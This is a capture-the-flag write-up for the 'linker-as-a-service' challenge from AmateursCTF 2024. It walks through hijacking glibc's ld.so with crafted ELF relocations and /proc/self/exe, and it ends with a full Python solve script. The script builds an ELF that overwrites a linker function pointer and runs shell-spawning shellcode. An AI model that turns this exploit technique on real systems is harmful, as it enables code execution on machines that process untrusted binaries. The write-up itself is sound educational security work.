Contents

AmateursCTF 2024

Writeup of pwn/linker-as-a-service from AmateursCTF 2024.

overview

The server asks for an ELF file, ensures that it’s an amd64 shared object with the provided ld.so interpreter, and then runs it. Easy shell right? But there’s a catch.

1
2
3
4
elf.run(env={
    "LD_TRACE_LOADED_OBJECTS": "1",
    "LD_WARN": "yes",
})

It’s run with environment variables that act as arguments to the linker.

LD_WARN (since glibc 2.1.3)
              If set to a nonempty string, warn about unresolved
              symbols.
LD_TRACE_LOADED_OBJECTS
              If set (to any value), causes the program to list its
              dynamic dependencies, as if run by ldd(1), instead of
              running normally.

The linker won’t transfer control to our ELF’s entry under this configuration. Before we go looking through glibc source to scope out our attack surface, let’s briefly introduce relocations, which are hinted at in the description.

relocations

Relocations within an ELF act as instructions to the linker to modify some memory at load time. There are 3 fields for a 64 bit rela (relocation with addend) entry.

typedef struct {
        Elf64_Addr      r_offset;
        Elf64_Xword     r_info;
        Elf64_Sxword    r_addend;
} Elf64_Rela;

r_offset specifies the virtual address of the memory to be modified, not including load bias. This limits us to modifying memory relative to where our ELF is mapped. r_info specifies both the type of the relocation and an associated symbol table index if applicable. r_addend specifies a constant addend to be used when computing the relocation.

Relocation types are machine dependent and can get confusing, but for this challenge we only need to use two amd64 relocations. R_AMD64_64 is the relocation S + A, where S is the address of a resolved symbol from r_info and A is the addend. R_AMD64_RELATIVE is the relocation B + A where B is the base virtual address where the ELF was actually mapped. This is important, since ASLR will randomize our ELF base address, so using relative relocs allows us to write to memory with valid addresses.

rtld

The ld.so we’re given is from glibc 2.36. The main source file we’re interested in is elf/rtld.c, which contains the code for the run time dynamic linker. Most of the important logic occurs in the dl_main function, and the first step of the process that we care about is shown in the following block of code.

  /* Load all the libraries specified by DT_NEEDED entries.  If LD_PRELOAD
     specified some libraries to load, these are inserted before the actual
     dependencies in the executable's searchlist for symbol resolution.  */
  {
    RTLD_TIMING_VAR (start);
    rtld_timer_start (&start);
    _dl_map_object_deps (main_map, preloads, npreloads,
			 state.mode == rtld_mode_trace, 0);
    rtld_timer_accum (&load_time, start);
  }

ELF shared objects are required to have a dynamic segment containing a list of tags that basically tell the linker what to do. A full description for each of these tags can be found here. DT_NEEDED tags specify the name of a shared object dependency. Before any relocations are processed, the linker recursively resolves these dependencies and maps them into memory.

Because we were graciously provided an ld.so with debug info, we can break on the corresponding line of code in gdb and see what happens after calling _dl_map_object_deps. I’ll also note here that for debugging this challenge, I used a small wrapper program and patchelf’d it to use the linker we were provided, which made gdb automatically resolve the debug symbols. You do, however, need to catch sys execve and continue before setting linker breakpoints, which prevents breaking on the first run of the linker for the wrapper program itself. There’s probably a better method, so let me know if I could improve this.

1
2
3
4
5
6
7
#include <unistd.h>
char *path = "./chal";
int main() { 
	char *args[] = {path, 0};
	char *envp[] = {"LD_TRACE_LOADED_OBJECTS=1", "LD_WARN=yes", 0};
	execve(path, args, envp);
}

We’ll run a test ELF with a DT_NEEDED tag for libc.so.6 and print mappings.

Start              Perm Path
0x0000555555554000 r-x /home/enzo/ctf/am24/linker-as-a-service/chal
0x00007ffff7de2000 r-- /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7e08000 r-x /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7f5d000 r-- /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7fb0000 rw- /home/enzo/ctf/am24/linker-as-a-service/libc.so.6
0x00007ffff7fb6000 rw- 
0x00007ffff7fc5000 r-- [vvar]
0x00007ffff7fc9000 r-x [vdso]
0x00007ffff7fcb000 r-- /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffff7fcc000 r-x /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffff7ff1000 r-- /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffff7ffb000 rw- /home/enzo/ctf/am24/linker-as-a-service/ld-linux-x86-64.so.2
0x00007ffffffde000 rw- [stack]
0xffffffffff600000 --x [vsyscall]
Notice that our original ELF is mapped separate from the linker, but the libc.so.6 is mapped adjacent to it. This is an interesting characteristic that will be helpful later.

warn

Once the linker has mapped dependencies, its job with regards to LD_TRACE_LOADED_OBJECTS is basically done. There is no need to perform relocations. Let’s look at the code for handling this.

  if (__glibc_unlikely (state.mode != rtld_mode_normal))
    {
      /* We were run just to list the shared libraries.  It is
	 important that we do this before real relocation, because the
	 functions we call below for output may no longer work properly
	 after relocation.  */

We’ll first be taken down a path that prints dependencies, and at the end of the if statement exit is called. So where is our attack surface?

 /* If LD_WARN is set, warn about undefined symbols.  */
	  if (GLRO(dl_lazy) >= 0 && GLRO(dl_verbose))
	    {
	      /* We have to do symbol dependency testing.  */
	      struct relocate_args args;
	      unsigned int i;

	      args.reloc_mode = ((GLRO(dl_lazy) ? RTLD_LAZY : 0)
				 | __RTLD_NOIFUNC);

LD_WARN being set wasn’t without purpose. As we saw earlier, it warns us about unresolved symbols, and the only way the linker can do that is by processing our ELF’s relocations.

	      i = main_map->l_searchlist.r_nlist;
	      while (i-- > 0)
		{
		  struct link_map *l = main_map->l_initfini[i];
		  if (l != &GL(dl_rtld_map) && ! l->l_faked)
		    {
		      args.l = l;
		      _dl_receive_error (print_unresolved, relocate_doit,
					 &args);
		    }
		}

Now we have a clear goal: corrupt some memory in the linker using bad relocations to hijack control flow before the linker exits.

corruption

There aren’t many sanity checks on relocations. We can supply an out-of-bounds offset and the address it points to will get written. The problem here is ASLR. As we saw earlier, our ELF and the linker are mapped in separate relative spaces, so the offset between the two is randomized. A potential way around this is to use self-modifying relocs, but there was an explicit check that prevented this in the server’s ELF processing, so we’ll need to find another way.

Recall that when we set a DT_NEEDED for libc.so.6, it was mapped adjacent to the linker. What happens if we map our own executable, which we can do using /proc/self/exe? Well, as expected, it will also get mapped adjacent to the linker. And our mapped self will have its relocs processed first, effectively bypassing the issue with ASLR. We now have arbitrary write into the linker’s memory.

From here, there are multiple methods to gain PC control. The author of the challenge modified the audit state of the linker, but I found a simple function pointer we can overwrite directly. The unresolved symbol warnings are performed by the call below.

_dl_receive_error(print_unresolved, relocate_doit, &args)

print_unresolved will be assigned to a linker variable called receiver, and _dl_lookup_symbol_x will call _dl_signal_cexception if the symbol can’t be resolved, which will jump to the address in receiver. We can use a relative reloc to overwrite receiver with the address of our own ELF in memory and supply an addend so it jumps to a location containing our shellcode. We will additionally need to supply another reloc that attempts to lookup an unresolvable symbol to trigger the exception handler. When performed successfully, the stack trace will look as follows, with rip pointing to the address of our ELF in the linker relative memory space.

elf crafting

Putting this all together into an ELF takes a little bit of work. I haven’t found an ELF library I enjoy yet, so I wrote everything from scratch in python. My solve script to generate the ELF is provided below.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
#!/usr/bin/env python3

from pwn import *

context.arch = "amd64"

DT_NULL = 0
DT_NEEDED = 1
DT_STRTAB = 5
DT_SYMTAB = 6
DT_RELA = 7
DT_RELASZ = 8
DT_RELAENT = 9
DT_SYMENT = 11
R_AMD64_64 = 1
R_AMD64_RELATIVE = 8

def ehdr(entry):
    h = b"\x7fELF"
    h += p8(2)
    h += p8(1)
    h += p8(1)
    h += p8(0)
    h += p64(0)
    h += p16(3)
    h += p16(0x3e)
    h += p32(1)
    h += p64(entry)
    h += p64(0x40)
    h += p64(shoff)
    h += p32(0)
    h += p16(0x40)
    h += p16(0x38)
    h += p16(phnum)
    h += p16(0x40)
    h += p16(shnum)
    h += p16(1)
    return h

def phdr(ptype, data, off=-1):
    global totalsz, edata, phdrs
    h = p32(ptype)
    h += p32(5)
    if off != -1:
        h += p64(off)*3
    else:
        h += p64(totalsz)*3
    h += p64(len(data))
    h += p64(len(data))
    h += p64(0)
    if off == -1:
        edata += data
        totalsz += len(data)
    phdrs += h

def shdr(name, stype, flags, data, link=0):
    global totalsz, edata, shdrs
    h = p32(shstridx[name])
    h += p32(stype)
    h += p64(flags)
    h += p64(0)
    h += p64(totalsz)
    h += p64(len(data)) 
    h += p32(link)
    h += p32(0)
    h += p64(0)
    if stype == 4 or stype == 2:
        h += p64(24)
    else:
        h += p64(0)
    edata += data
    totalsz += len(data)
    shdrs += h

def dtag(tag, val):
    global dtags
    dtags += p64(tag)+p64(val)

def rela(off, inf, add):
    return p64(off)+p64(inf)+p64(add)

def symb(name, inf, vis, idx, val, size):
    return p32(name)+p8(inf)+p8(vis)+p16(idx)+p64(val)+p64(size)

phnum = 4
shnum = 8
shoff = 0x40 + 0x38*phnum
totalsz = 0x40 + 0x38*phnum + 0x40*shnum
edata = b""
phdrs = b""
shdrs = b""
dtags = b""
shstr = [
    b"",
    b".shstrtab",
    b".strtab",
    b".dynstr",
    b".dynsym",
    b".rela.dyn",
    b".dynamic",
    b".interp",
]
dynstr = [
    b"idontexist",
    b"/proc/self/exe",
]
shstrtab = b""
shstridx = []
for s in shstr:
    shstridx.append(len(shstrtab))
    shstrtab += s + b"\x00"
dynstridx = []
dynstrtab = b""
for s in dynstr:
    dynstridx.append(len(dynstrtab))
    dynstrtab += s + b"\x00"
strtab = b"\x00"

dtag(DT_SYMENT, 24)
# map ourselves with /proc/self/exe
dtag(DT_NEEDED, dynstridx[1])
shdr(0, 0, 0, b"")
shdr(1, 3, 0, shstrtab)
shdr(2, 3, 0, strtab)
dtag(DT_STRTAB, totalsz)
shdr(3, 3, 3, dynstrtab)
# just need one symbol that doesn't exist
dtag(DT_SYMTAB, totalsz)
shdr(4, 2, 3, symb(10, (1<<4)|2, 0, 0, 0, 0), 3)

# this offset from ELF base to linker memory can differ
offset = 0x36218
if args.GDB:
    offset += 0x6000
# first reloc to overwrite `receiver` in linker memory with an address to code in our ELF.
# second reloc with unresolvable symbol to trigger _dl_signal_cexception, which
# will call receiver function pointer, which is supposed to be print_unresolved,
# but will now just jump to our own code and spawn a shell
reladyn = rela(offset, R_AMD64_RELATIVE, 0x600) + rela(0, R_AMD64_64, 0x600)
dtag(DT_RELA, totalsz)
dtag(DT_RELASZ, len(reladyn))
dtag(DT_RELAENT, 24)
shdr(5, 4, 3, reladyn)
dynoff = totalsz
dtag(DT_NULL, 0)
shdr(6, 6, 3, dtags, 3)

interp = totalsz
ldpath = b"./ld-linux-x86-64.so.2\x00".ljust(43, b"\x00")
if args.REMOTE:
    ldpath = b"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\x00".ljust(43, b"\x00")
shdr(7, 1, 0, ldpath)

phdr(6, b"A"*0x38*phnum, off=0x40)
phdr(1, b"A"*(0x38*phnum+0x40*shnum+totalsz+0x400), off=0x40)
phdr(3, ldpath, interp)
phdr(2, dtags, dynoff)
# linker will jump to this code
edata += b"\x90"*0x200 + asm(shellcraft.amd64.linux.sh())

e = ehdr(0) + phdrs + shdrs + edata
f = open("chal", "wb")
f.write(e)
f.close()

And here’s a picture of it working. This was a very creative and fun challenge, huge props to the author unvariant.